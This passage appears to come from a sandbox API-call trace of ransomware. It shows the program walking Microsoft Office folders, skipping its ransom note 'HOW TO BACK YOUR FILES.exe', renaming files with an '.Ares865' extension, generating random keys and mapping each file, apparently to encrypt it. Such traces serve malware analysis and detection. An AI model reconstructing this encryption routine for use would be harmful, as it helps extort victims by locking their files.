Office\\Office14\\PUBWIZ\\DGMAIN.XML.Ares865") returned 68 [0067.517] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGMAIN.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgmain.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGMAIN.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgmain.xml.ares865"), dwFlags=0x1) returned 1 [0067.517] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGMAIN.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgmain.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x120 [0067.518] GetFileSizeEx (in: hFile=0x120, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=3641) returned 1 [0067.518] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0067.518] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0067.518] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0067.518] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f00d8) returned 1 [0067.519] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0067.519] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0067.519] CreateFileMappingW (hFile=0x120, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1140, lpName=0x0) returned 0x164 [0067.522] MapViewOfFile (hFileMappingObject=0x164, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1140) returned 0x1a0000 [0067.560] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0067.561] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0067.561] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0067.561] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0067.561] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 [0067.561] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0067.561] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0067.561] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0067.561] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0067.561] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0067.561] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0067.562] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0067.562] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0067.562] UnmapViewOfFile (lpBaseAddress=0x1a0000) returned 1 [0067.562] CloseHandle (hObject=0x164) returned 1 [0067.562] CloseHandle (hObject=0x120) returned 1 [0067.562] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0067.562] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0067.562] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0067.562] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef4e5000, ftCreationTime.dwHighDateTime=0x1c5d95d, ftLastAccessTime.dwLowDateTime=0x51df3bd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xef4e5000, ftLastWriteTime.dwHighDateTime=0x1c5d95d, nFileSizeHigh=0x0, nFileSizeLow=0x2c00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DGMARQ.DPV", cAlternateFileName="")) returned 1 [0067.562] lstrcmpiW (lpString1="DGMARQ.DPV", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0067.562] lstrcmpiW (lpString1="DGMARQ.DPV", lpString2="aoldtz.exe") returned 1 [0067.562] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGMARQ.XML.Ares865") returned 68 [0067.562] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGMARQ.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgmarq.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGMARQ.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgmarq.xml.ares865"), dwFlags=0x1) returned 1 [0067.564] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGMARQ.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgmarq.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0067.564] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=826) returned 1 [0067.564] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0067.564] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0067.564] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0067.564] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0067.565] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0067.565] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0067.565] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x640, lpName=0x0) returned 0x15c [0067.567] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x640) returned 0x190000 [0067.568] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0067.568] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0067.568] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0067.568] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0067.568] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 [0067.568] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0067.569] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0067.569] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0067.569] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0067.569] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9710 [0067.569] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0067.569] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9710 | out: hHeap=0x2b0000) returned 1 [0067.569] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0067.569] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0067.569] CloseHandle (hObject=0x15c) returned 1 [0067.569] CloseHandle (hObject=0x164) returned 1 [0067.569] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0067.569] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0067.569] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0067.569] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6e00d500, ftCreationTime.dwHighDateTime=0x1c7e8c8, ftLastAccessTime.dwLowDateTime=0x51df3bd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6e00d500, ftLastWriteTime.dwHighDateTime=0x1c7e8c8, nFileSizeHigh=0x0, nFileSizeLow=0x50f94, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DGMASTHD.DPV", cAlternateFileName="")) returned 1 [0067.569] lstrcmpiW (lpString1="DGMASTHD.DPV", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0067.569] lstrcmpiW (lpString1="DGMASTHD.DPV", lpString2="aoldtz.exe") returned 1 [0067.570] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGNAVBAR.XML.Ares865") returned 70 [0067.570] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGNAVBAR.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgnavbar.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGNAVBAR.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgnavbar.xml.ares865"), dwFlags=0x1) returned 1 [0067.570] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGNAVBAR.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgnavbar.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0067.570] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=4546) returned 1 [0067.570] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0067.571] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0067.571] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0067.571] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0067.571] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0067.571] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0067.572] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x14d0, lpName=0x0) returned 0x15c [0067.573] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x14d0) returned 0x190000 [0067.574] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0067.575] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0067.575] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0067.575] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0067.575] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 [0067.575] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0067.575] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0067.575] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0067.575] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0067.575] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0067.575] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0067.575] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0067.575] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0067.575] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0067.575] CloseHandle (hObject=0x15c) returned 1 [0067.575] CloseHandle (hObject=0x164) returned 1 [0067.575] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0067.575] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0067.576] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0067.576] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdb8e7500, ftCreationTime.dwHighDateTime=0x1c9a6a9, ftLastAccessTime.dwLowDateTime=0x51df3bd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xdb8e7500, ftLastWriteTime.dwHighDateTime=0x1c9a6a9, nFileSizeHigh=0x0, nFileSizeLow=0x1eeda, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DGPICCAP.DPV", cAlternateFileName="")) returned 1 [0067.576] lstrcmpiW (lpString1="DGPICCAP.DPV", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0067.576] lstrcmpiW (lpString1="DGPICCAP.DPV", lpString2="aoldtz.exe") returned 1 [0067.576] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGPICCAP.XML.Ares865") returned 70 [0067.576] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGPICCAP.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgpiccap.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGPICCAP.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgpiccap.xml.ares865"), dwFlags=0x1) returned 1 [0067.577] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGPICCAP.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgpiccap.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0067.577] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=6858) returned 1 [0067.577] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0067.577] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0067.577] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0067.577] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0067.578] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0067.578] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0067.578] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1dd0, lpName=0x0) returned 0x120 [0067.579] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1dd0) returned 0x190000 [0067.580] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0067.581] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0067.581] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0067.581] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0067.581] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 [0067.581] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0067.581] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0067.581] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0067.581] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0067.581] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0067.582] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0067.582] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0067.582] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0067.582] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0067.582] CloseHandle (hObject=0x120) returned 1 [0067.582] CloseHandle (hObject=0x164) returned 1 [0067.582] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0067.582] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0067.582] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0067.582] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36e97a00, ftCreationTime.dwHighDateTime=0x1c7e417, ftLastAccessTime.dwLowDateTime=0x60786a90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x36e97a00, ftLastWriteTime.dwHighDateTime=0x1c7e417, nFileSizeHigh=0x0, nFileSizeLow=0x938f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DGPQUOT.DPV", cAlternateFileName="")) returned 1 [0067.582] lstrcmpiW (lpString1="DGPQUOT.DPV", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0067.582] lstrcmpiW (lpString1="DGPQUOT.DPV", lpString2="aoldtz.exe") returned 1 [0067.582] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGPQUOT.XML.Ares865") returned 69 [0067.582] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGPQUOT.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgpquot.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGPQUOT.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgpquot.xml.ares865"), dwFlags=0x1) returned 1 [0067.583] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGPQUOT.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgpquot.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0067.584] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=7072) returned 1 [0067.584] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0067.584] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0067.584] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0067.584] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0067.585] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0067.585] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0067.585] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1ea0, lpName=0x0) returned 0x120 [0067.588] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1ea0) returned 0x190000 [0067.589] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0067.589] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0067.590] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0067.590] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0067.590] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 [0067.590] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0067.590] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0067.590] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0067.590] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0067.590] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0067.590] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0067.590] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0067.590] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0067.590] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0067.590] CloseHandle (hObject=0x120) returned 1 [0067.590] CloseHandle (hObject=0x164) returned 1 [0067.590] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0067.590] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0067.590] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0067.591] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b69d100, ftCreationTime.dwHighDateTime=0x1c5d95e, ftLastAccessTime.dwLowDateTime=0x51df3bd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1b69d100, ftLastWriteTime.dwHighDateTime=0x1c5d95e, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DGPUNCT.DPV", cAlternateFileName="")) returned 1 [0067.591] lstrcmpiW (lpString1="DGPUNCT.DPV", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0067.591] lstrcmpiW (lpString1="DGPUNCT.DPV", lpString2="aoldtz.exe") returned 1 [0067.591] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGPUNCT.XML.Ares865") returned 69 [0067.591] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGPUNCT.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgpunct.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGPUNCT.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgpunct.xml.ares865"), dwFlags=0x1) returned 1 [0067.592] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGPUNCT.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgpunct.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0067.592] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=1366) returned 1 [0067.592] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0067.592] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0067.592] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0067.592] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0067.593] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0067.593] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0067.593] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x860, lpName=0x0) returned 0x120 [0067.595] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, 